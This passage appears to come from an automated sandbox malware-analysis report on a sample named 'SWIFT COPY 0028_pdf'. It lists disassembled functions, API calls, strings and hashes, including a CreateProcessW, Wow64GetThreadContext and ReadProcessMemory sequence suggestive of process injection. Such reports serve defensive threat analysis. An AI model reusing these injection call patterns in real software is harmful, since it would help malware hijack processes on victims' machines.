                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 1053898822-1585850449
                                                                                    • Opcode ID: f613adfdf7585d3117209526f8176da7d84bbce1e35ec3a49f03f1b2e5d59f6d
                                                                                    • Instruction ID: bcfcd9ec92a7794847814269c5a5ae29ff5969a56be08522b2bd8879fd97faf0
                                                                                    • Opcode Fuzzy Hash: f613adfdf7585d3117209526f8176da7d84bbce1e35ec3a49f03f1b2e5d59f6d
                                                                                    • Instruction Fuzzy Hash: 6231D07140C750AFD321EB60EC46FDE77D8AF84300F00451EF599860D6EB70AA48CB92
                                                                                    Function 00924139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009239FE,?,00000001), ref: 009241DB
                                                                                    • _free.LIBCMT ref: 009936B7
                                                                                    • _free.LIBCMT ref: 009936FE
                                                                                      • Part of subcall function 0092C833: __wsplitpath.LIBCMT ref: 0092C93E
                                                                                      • Part of subcall function 0092C833: _wcscpy.LIBCMT ref: 0092C953
                                                                                      • Part of subcall function 0092C833: _wcscat.LIBCMT ref: 0092C968
                                                                                      • Part of subcall function 0092C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0092C978
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 805182592-1757145024
                                                                                    • Opcode ID: 9154e2c06ee6326987212da1483a2e3c91ec39946391c525864274e9e376eee2
                                                                                    • Instruction ID: fdeda553b187bc6719c9f4b447aeee6161d88d2704540008f79238449b3bd69d
                                                                                    • Opcode Fuzzy Hash: 9154e2c06ee6326987212da1483a2e3c91ec39946391c525864274e9e376eee2
                                                                                    • Instruction Fuzzy Hash: 22917471910229EFCF04EFA8DC91AEDB7B8BF59310F108429F416AB295DB349A45CF50
                                                                                    Function 00924A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00925374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009E1148,?,009261FF,?,00000000,00000001,00000000), ref: 00925392
                                                                                      • Part of subcall function 009249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00924A1D
                                                                                    • _wcscat.LIBCMT ref: 00992D80
                                                                                    • _wcscat.LIBCMT ref: 00992DB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                                    • String ID: \$\Include\
                                                                                    • API String ID: 3592542968-2640467822
                                                                                    • Opcode ID: 363b8438c96e05d73c94372ab3a208229b89ee9472a8bb2051245120f0f300a2
                                                                                    • Instruction ID: b00c4c17025ed314242c99d287b39b6e6e7ae64f898566dd3936426f04142653
                                                                                    • Opcode Fuzzy Hash: 363b8438c96e05d73c94372ab3a208229b89ee9472a8bb2051245120f0f300a2
                                                                                    • Instruction Fuzzy Hash: F251627142C3809FC714EF59E9C199AB7FCBF99300B50452EF6848B2A1EB709E08DB52
                                                                                    Function 009434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getstream.LIBCMT ref: 009434FE
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00943539
                                                                                    • __wopenfile.LIBCMT ref: 00943549
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                    • String ID: <G
                                                                                    • API String ID: 1820251861-2138716496
                                                                                    • Opcode ID: c1a6ac8196979b50dcc2b228b84088aefa2c28391fde854d449549ec22694c7f
                                                                                    • Instruction ID: 3f1bb9d87be1dbf86814b5ca6d60140e31e4e12278eeca36e9cb138819bcedba
                                                                                    • Opcode Fuzzy Hash: c1a6ac8196979b50dcc2b228b84088aefa2c28391fde854d449549ec22694c7f
                                                                                    • Instruction Fuzzy Hash: CE11EC70A00206DFDB11BFB48C42FAF76A4AF85354B15C925F419D72D1EB34CA1197B1
                                                                                    Function 0093D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0093D28B,SwapMouseButtons,00000004,?), ref: 0093D2BC
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0093D28B,SwapMouseButtons,00000004,?,?,?,?,0093C865), ref: 0093D2DD
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0093D28B,SwapMouseButtons,00000004,?,?,?,?,0093C865), ref: 0093D2FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: dc03bdfc8d5129d2b9fc05a938b9793ed84452e9098087270a81339efdea10a4
                                                                                    • Instruction ID: 499b1ab0bf252030495b172a89fad779d338ac272451648531cf04c0577bef6e
                                                                                    • Opcode Fuzzy Hash: dc03bdfc8d5129d2b9fc05a938b9793ed84452e9098087270a81339efdea10a4
                                                                                    • Instruction Fuzzy Hash: 51117C75612218BFDB108F64DC84EAF7BBCEF05744F004829F902D7210E6319E40ABA0
                                                                                    Function 01026188 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010269D9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010269FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction ID: d24063d7eccb5464e5f467a0f87f5dbeb03949c066903876de768dad0635929f
                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction Fuzzy Hash: 3B621D30A14218DBEB24DFA4C850BEEB776EF58300F1091A9D50DEB390E7769E81CB59
                                                                                    Function 0096C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00924517: _fseek.LIBCMT ref: 0092452F
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C65D
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C670
                                                                                    • _free.LIBCMT ref: 0096C4DD
                                                                                    • _free.LIBCMT ref: 0096C4E4
                                                                                    • _free.LIBCMT ref: 0096C54F
                                                                                      • Part of subcall function 00941C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00947A85), ref: 00941CB1
                                                                                      • Part of subcall function 00941C9D: GetLastError.KERNEL32(00000000,?,00947A85), ref: 00941CC3
                                                                                    • _free.LIBCMT ref: 0096C557
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                    • Instruction ID: 183b1dfee9adc32d4858441afdde2f6f8cbea1ce4942a01f1ba7b3fe58165677
                                                                                    • Opcode Fuzzy Hash: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                    • Instruction Fuzzy Hash: B2514DF1A04218AFDF149F64DC81BADBBB9EF88304F1044AEF259E3251DB715A808F59
                                                                                    Function 0093EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0093EBB2
                                                                                      • Part of subcall function 009251AF: _memset.LIBCMT ref: 0092522F
                                                                                      • Part of subcall function 009251AF: _wcscpy.LIBCMT ref: 00925283
                                                                                      • Part of subcall function 009251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00925293
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0093EC07
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093EC16
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00993C88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: 4b0671c03f6238afde3b2333bc7df151bc3450c7649cca81a4fcbd247888e547
                                                                                    • Instruction ID: 13ae3d0754eb250783dacbaa29658f62682a30b68dbabbcac895d44c38c0805c
                                                                                    • Opcode Fuzzy Hash: 4b0671c03f6238afde3b2333bc7df151bc3450c7649cca81a4fcbd247888e547
                                                                                    • Instruction Fuzzy Hash: 2F21AA71908794AFEB329F288855BEBBBEC9F45308F04444DE6DB56182D3746E84CB51
                                                                                    Function 009240E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00993725
                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0099376F
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                      • Part of subcall function 009240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009240C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    • Opcode ID: c830493a516067d285fc9fbf1e87483c6939959d2a6dedeed8885ecaa883ab17
                                                                                    • Instruction ID: 0184e1f7d7054c4416008b6417224238c0dae61ce6686b6e6e2583f1307fd549
                                                                                    • Opcode Fuzzy Hash: c830493a516067d285fc9fbf1e87483c6939959d2a6dedeed8885ecaa883ab17
                                                                                    • Instruction Fuzzy Hash: 6821E771A142A8AFCF11DFD8D845BDEBBFC9F89300F00801AE505AB245DBB45A898F61
                                                                                    Function 0096C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0096C72F
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0096C746
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: d4d940c4a1965adaf671e3b363adad5680709387ff9cf00d0119e23aa1727605
                                                                                    • Instruction ID: db1876f2032c23d693388010002ceb96fc027dc8e4c3b75c57a129c347b2177d
                                                                                    • Opcode Fuzzy Hash: d4d940c4a1965adaf671e3b363adad5680709387ff9cf00d0119e23aa1727605
                                                                                    • Instruction Fuzzy Hash: 6CD05E7554030EABDB10AB90DC0EFCA776C9F00708F0041A17A61A50B1DAB0E699CB95
                                                                                    Function 0097F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 781e771930a2c8d9e32cc9cf24d048da2ca1e97f5525b32f45d617bbce2c5f36
                                                                                    • Instruction ID: 267fe8a3e26d7bf86c675bb1eb2f208f9be4b4c47190fe8cc431136290c6059f
                                                                                    • Opcode Fuzzy Hash: 781e771930a2c8d9e32cc9cf24d048da2ca1e97f5525b32f45d617bbce2c5f36
                                                                                    • Instruction Fuzzy Hash: D7F158726083019FCB10DF24C891B6AB7E5FFC8314F14896EF9999B292D734E905CB82
                                                                                    Function 00924FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00925022
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009250CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell__memset
                                                                                    • String ID:
                                                                                    • API String ID: 928536360-0
                                                                                    • Opcode ID: 21e71d50bbc5ab3b6a0256bbbf34adbc47fce5b7bd91b80963473eea66c63b08
                                                                                    • Instruction ID: 12c236c9620f4ff65265421a03234f2bf7b686203350268fa136b0bfd2be33f5
                                                                                    • Opcode Fuzzy Hash: 21e71d50bbc5ab3b6a0256bbbf34adbc47fce5b7bd91b80963473eea66c63b08
                                                                                    • Instruction Fuzzy Hash: CD31D2B0608711CFD720EF24E88169BBBE8FF48305F00092EF69E87251E771A944CB92
                                                                                    Function 0094395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 009481C2: __NMSG_WRITE.LIBCMT ref: 009481E9
                                                                                      • Part of subcall function 009481C2: __NMSG_WRITE.LIBCMT ref: 009481F3
                                                                                    • __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094821F: GetModuleFileNameW.KERNEL32(00000000,009E0312,00000104,00000000,00000001,00000000), ref: 009482B1
                                                                                      • Part of subcall function 0094821F: ___crtMessageBoxW.LIBCMT ref: 0094835F
                                                                                      • Part of subcall function 00941145: ___crtCorExitProcess.LIBCMT ref: 0094114B
                                                                                      • Part of subcall function 00941145: ExitProcess.KERNEL32 ref: 00941154
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: da8580ec71c9f25e316a65cb5bc5e2dcecbb2aaa545e0fa4143faaede153ac8f
                                                                                    • Instruction ID: 862b6608828658d9e5503536e8a2bfeee300153d67842de0b5154ab5740b5345
                                                                                    • Opcode Fuzzy Hash: da8580ec71c9f25e316a65cb5bc5e2dcecbb2aaa545e0fa4143faaede153ac8f
                                                                                    • Instruction Fuzzy Hash: A801B531359245DAE6213B74DC96F2E734C9FC1764F218026F5059B3D2DFF49D4086A0
                                                                                    Function 0096C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0096C385,?,?,?,?,?,00000004), ref: 0096C6F2
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0096C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0096C708
                                                                                    • CloseHandle.KERNEL32(00000000,?,0096C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0096C70F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 7090496ca75ab8c914f46e7454649d8b00a4e4f31433670ec1cd58b51b0058c5
                                                                                    • Instruction ID: 441ba93dfb93878e18d24f45f646f63af6965887b9960bb356a312a0f9d745af
                                                                                    • Opcode Fuzzy Hash: 7090496ca75ab8c914f46e7454649d8b00a4e4f31433670ec1cd58b51b0058c5
                                                                                    • Instruction Fuzzy Hash: 2EE08632245214B7DB211B54AC09FDE7B18EF06764F104110FB55694E097B1251197D8
                                                                                    Function 0096BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0096BB72
                                                                                      • Part of subcall function 00941C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00947A85), ref: 00941CB1
                                                                                      • Part of subcall function 00941C9D: GetLastError.KERNEL32(00000000,?,00947A85), ref: 00941CC3
                                                                                    • _free.LIBCMT ref: 0096BB83
                                                                                    • _free.LIBCMT ref: 0096BB95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
